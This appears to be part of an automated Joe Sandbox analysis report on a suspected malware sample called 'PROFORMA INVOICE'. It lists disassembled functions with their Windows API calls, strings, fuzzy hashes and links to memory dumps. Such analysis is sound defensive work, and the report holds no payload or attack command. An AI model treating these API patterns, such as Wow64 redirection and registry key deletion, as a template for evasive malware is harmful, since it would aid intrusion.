Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ed5e5bb73497b95169727225239f94b31a4f5dfd704091118b74e9de97264e01
Instruction ID: f2b569ecea658639d1f062e7915608b8127bde6c4d4a72df7997e2f48fc39cb6
Opcode Fuzzy Hash: ed5e5bb73497b95169727225239f94b31a4f5dfd704091118b74e9de97264e01
Instruction Fuzzy Hash: BF316F31A0020AAFDB218E34CD46FEA77A9BF49338F244719F975931E0D775A850AB51

Function 00FCA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FCA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FCA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FCA196

Strings

SysMonthCal32, xrefs: 00FCA129

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: bbc779f8ba81f11b5ce554c454f0d1f944bb7bc6c49961976cfa7f849f6f01bb
Instruction ID: dbb218a7e9a976f6744a51c0bef3b8b96d5d2a586300161b1092960bc53046c0
Opcode Fuzzy Hash: bbc779f8ba81f11b5ce554c454f0d1f944bb7bc6c49961976cfa7f849f6f01bb
Instruction Fuzzy Hash: EF219132510219ABDF118F94CC86FEA3B79EF48724F150118FA55AB1D0D6B5BC51DB90

Function 00FCA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FCA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FCA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FCA956

Strings

msctls_updown32, xrefs: 00FCA8BB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 13081d05d95f8cc7e487956efb822f17ef451102e5b5271bc9966317812f67b6
Instruction ID: b376a38cab21d8602ce290ba89bdd235e08989b126c2c20ddf6a6b9e68a6e711
Opcode Fuzzy Hash: 13081d05d95f8cc7e487956efb822f17ef451102e5b5271bc9966317812f67b6
Instruction Fuzzy Hash: 0021A3B5A0020AAFDB10DF54CCC2E6B37ADEB4A368B05015DF9049B251CB35EC11AB61

Function 00FC99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FC9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FC9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FC9A65

Strings

Listbox, xrefs: 00FC99FD

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 83a163122fe5ae1aab795286513656de495e2145f0a82736487993876aa6f919
Instruction ID: a792f8577c1554e296284a7ac2555466a7e717421932a5cb2ef15133014fe578
Opcode Fuzzy Hash: 83a163122fe5ae1aab795286513656de495e2145f0a82736487993876aa6f919
Instruction Fuzzy Hash: 0C21C832A14119BFDF258F54CC8AFBF376AEF89760F01811DF9545B190C6B59C119790

Function 00FCA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FCA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FCA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FCA48F

Strings

msctls_trackbar32, xrefs: 00FCA444

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3da35a725c32326a7046047fd11ad373185bbc23d656c5d6991f00fbc2711188
Instruction ID: 85ac8fb373e19b3ea5ae7ef3b0ee660e97d77a6f5c371ef95c9e95296d2bb802
Opcode Fuzzy Hash: 3da35a725c32326a7046047fd11ad373185bbc23d656c5d6991f00fbc2711188
Instruction Fuzzy Hash: FB11E771600209BEEF249F65CC4AFAB3769EF88768F11411CFA45960A1D2B6A811E720

Function 00F82287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00F82350,?), ref: 00F822A1
GetProcAddress.KERNEL32(00000000), ref: 00F822A8

Strings

combase.dll, xrefs: 00F8229C
RoInitialize, xrefs: 00F82290

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 33e5ddd903989b02b40dd80d1b088a3dfb754aee73b8b9050618dff82ae68f88
Instruction ID: 8526bdfda5fe22856dc16bbb904a733647414c569550b2ccb54dd405a328737f
Opcode Fuzzy Hash: 33e5ddd903989b02b40dd80d1b088a3dfb754aee73b8b9050618dff82ae68f88
Instruction Fuzzy Hash: F6E01A70A90340EBEB706F71ED89B543664B700B16F204064F182D6498CBBE9080EF04

Function 00F8235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F82276), ref: 00F82376
GetProcAddress.KERNEL32(00000000), ref: 00F8237D

Strings

combase.dll, xrefs: 00F82371
RoUninitialize, xrefs: 00F82365

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: ba0bb47827aa38168cdf51935dea749a2f8dfb2a007404b64529483d488b3085
Instruction ID: 8d56772118cafd90b3a82587f3976e2b7726c5f481a85a274bf1e29edd33c48e
Opcode Fuzzy Hash: ba0bb47827aa38168cdf51935dea749a2f8dfb2a007404b64529483d488b3085
Instruction Fuzzy Hash: B4E01270A45344EFDB716F61ED0EB043A65B700716F310424F189D64ACCBBE9400EB14

Function 00FDAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00FDAC60
__swprintf.LIBCMT ref: 00FDAC94

Strings

WIN_XPe, xrefs: 00FDACD3
%.3d, xrefs: 00FDAC6E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 44b6632aeb171827570187debc2ec7c44ef9f6e7aea7278633c0f633e677bd7e
Instruction ID: 7728054b922365f10ad2adb9c9c496622a065d48e078b4149b963c085ab67c4c
Opcode Fuzzy Hash: 44b6632aeb171827570187debc2ec7c44ef9f6e7aea7278633c0f633e677bd7e
Instruction Fuzzy Hash: 3FE0EC738146189BCA109B508D45EFA737DAB08751F580093BA06A2214E639DB84BA16

Function 00F642F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F642EC,?,00F642AA,?), ref: 00F64304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F64316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00F64310
kernel32.dll, xrefs: 00F642FF

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 7469f4361ef851ddb384b56741d2327863ef294af50c812d609bb88d0ac53daf
Instruction ID: 5553f9676b9779cfcf8867407ef9f87d52fa98765988b80089841ff419b4d74d
Opcode Fuzzy Hash: 7469f4361ef851ddb384b56741d2327863ef294af50c812d609bb88d0ac53daf
Instruction Fuzzy Hash: 07D0A730800712AFD7205F21E84D60276E9EB04325B10441DE481DB624D778D880AB10

Function 00FC2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FC21FB,?,00FC23EF), ref: 00FC2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00FC2225

Strings

GetProcessId, xrefs: 00FC221F
kernel32.dll, xrefs: 00FC220E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: af829c786570fe6b305279441ccbd1d2f1958f9076ff6bf52eba17a3a99cb60d
Instruction ID: 9a389ebb00995100f538299e6923d11d5853eef994ba3fdb720b68b6056480b8
Opcode Fuzzy Hash: af829c786570fe6b305279441ccbd1d2f1958f9076ff6bf52eba17a3a99cb60d
Instruction Fuzzy Hash: 3AD0A7348007179FE7214F31F949B4176E8EB04724B10442DE881E6520D778D880A750

Function 00F6434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00F641BB,00F64341,?,00F6422F,?,00F641BB,?,?,?,?,00F639FE,?,00000001), ref: 00F64359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F6436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00F64365
kernel32.dll, xrefs: 00F64354

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 42ecc08e4846b8714427c48024ebffc9bf5c14d43f523e2cf049b0259115a3b2
Instruction ID: 56c82fe493985f167c359f1432637796f008b2bd7a4b43dbfe9f7ccdb95adee2
Opcode Fuzzy Hash: 42ecc08e4846b8714427c48024ebffc9bf5c14d43f523e2cf049b0259115a3b2
Instruction Fuzzy Hash: 07D0A7308007129FD7205F31E84960176E8AB10729B10441DE4C1DA610D778E880E714

Function 00FA0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00FA052F,?,00FA06D7), ref: 00FA0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00FA0584

Strings

UnRegisterTypeLibForUser, xrefs: 00FA057E
oleaut32.dll, xrefs: 00FA056D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: cf237eb6b60036aefa2b160d42ff77b7ce5571f7c2b8165e9a0f3ec0f759147a
Instruction ID: 4ad11ccb79faf5871aa21eb79f8924c040baae1bc08761240f7a9c4e1597dc26
Opcode Fuzzy Hash: cf237eb6b60036aefa2b160d42ff77b7ce5571f7c2b8165e9a0f3ec0f759147a
Instruction Fuzzy Hash: 12D0A770C003129FD7205F31F848F0277D4AB05314F24842DE881D6514DB78D4C4AF20

Function 00FA0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,00FA051D,?,00FA05FE), ref: 00FA0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00FA0559

Strings

RegisterTypeLibForUser, xrefs: 00FA0553
oleaut32.dll, xrefs: 00FA0542

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 2c3554007d28ec9d89d9da1ef28eb1a3718d67a3bf4af25a91bb52617fa1f1fd
Instruction ID: 9dadfcb3d43e9a2ea1bf8d03f7ccd496c5ed1d09d802ddc5d04a1824f792f39a
Opcode Fuzzy Hash: 2c3554007d28ec9d89d9da1ef28eb1a3718d67a3bf4af25a91bb52617fa1f1fd
Instruction Fuzzy Hash: A4D0A770C007129FDB208F21F848601B6D4AB01315F28C42DF486D6514DA78C8809B10

Function 00FBECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FBECBE,?,00FBEBBB), ref: 00FBECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FBECE8

Strings

GetSystemWow64DirectoryW, xrefs: 00FBECE2
kernel32.dll, xrefs: 00FBECD1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 64d766c4395e9d59944b76a9ce5071ebee44ba3ec4515498ff158d0c99eff46c
Instruction ID: 9cf343ec0044cb1549777e2022d5fe4b370d2911ef9b8f70af2dadfee9787c63
Opcode Fuzzy Hash: 64d766c4395e9d59944b76a9ce5071ebee44ba3ec4515498ff158d0c99eff46c
Instruction Fuzzy Hash: 47D0A7708007239FDB205F62E8886C27AE8AF04314B10841DF885D6520DF78C884EB50

Function 00FBBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00FBBAD3,00000001,00FBB6EE,?,00FFDC00), ref: 00FBBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FBBAFD

Strings

GetModuleHandleExW, xrefs: 00FBBAF7
kernel32.dll, xrefs: 00FBBAE6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: d07518a7e500a30ac6b0c71d0b0c0cc55ee324ece5197f57d78ff143fbd3a200
Instruction ID: 41835184d00356daaf110bd88eae6d9424c4b4f6ecdf426079632b0435ed3b49
Opcode Fuzzy Hash: d07518a7e500a30ac6b0c71d0b0c0cc55ee324ece5197f57d78ff143fbd3a200
Instruction Fuzzy Hash: 97D0A774C007129FD7305F23E888B5176E8EB00314B10841DE883D6524D7B8C880DB10

Function 00FC3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00FC3BD1,?,00FC3E06), ref: 00FC3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FC3BFB

Strings

advapi32.dll, xrefs: 00FC3BE4
RegDeleteKeyExW, xrefs: 00FC3BF5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 2349ab5b92ee87b1d592767393b3aaa7205879e6220a182dac3738d46fb61de0
Instruction ID: 781c16787fd29ccec27d5a211b3860bc05e7911be72d9ac5eab98835ddf45757
Opcode Fuzzy Hash: 2349ab5b92ee87b1d592767393b3aaa7205879e6220a182dac3738d46fb61de0
Instruction Fuzzy Hash: 7ED0A770800757DFD7209F61E949B07BAF4AB0432CB10881DE485E6524D7BCC4809F10

Function 00F99B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 919e96e13e765a849e2d93b5295c3a2972aef49200c543335209df8af335ec1a
Instruction ID: a924df4d447f4b0c1a443240f5959889a401562623e064e97e8c6c66f1413567
Opcode Fuzzy Hash: 919e96e13e765a849e2d93b5295c3a2972aef49200c543335209df8af335ec1a
Instruction Fuzzy Hash: 97C17C75A0421AEFEF14DF98C884AAEB7B5FF48710F11459CE901AB291D770DE41EBA0

Function 00FBAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FBAAB4
CoUninitialize.OLE32 ref: 00FBAABF

Part of subcall function 00FA0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA027B

VariantInit.OLEAUT32(?), ref: 00FBAACA
VariantClear.OLEAUT32(?), ref: 00FBAD9D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 5951765dcee84375d3a9c356bed7266d3ee63076321e78f3bf36064c70fe8acb
Instruction ID: 9f067977a4da97928205d80353aa1a46127c26c31c1c0723625923699e3b5277
Opcode Fuzzy Hash: 5951765dcee84375d3a9c356bed7266d3ee63076321e78f3bf36064c70fe8acb
Instruction Fuzzy Hash: 37A147756047019FDB11EF15C881B5AB7E8FF88720F048449F99A9B3A2CB74ED04EB86

